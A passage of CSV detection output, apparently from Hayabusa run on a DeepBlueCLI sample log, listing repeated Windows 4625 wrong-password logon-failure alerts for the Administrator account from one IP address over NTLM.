NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: 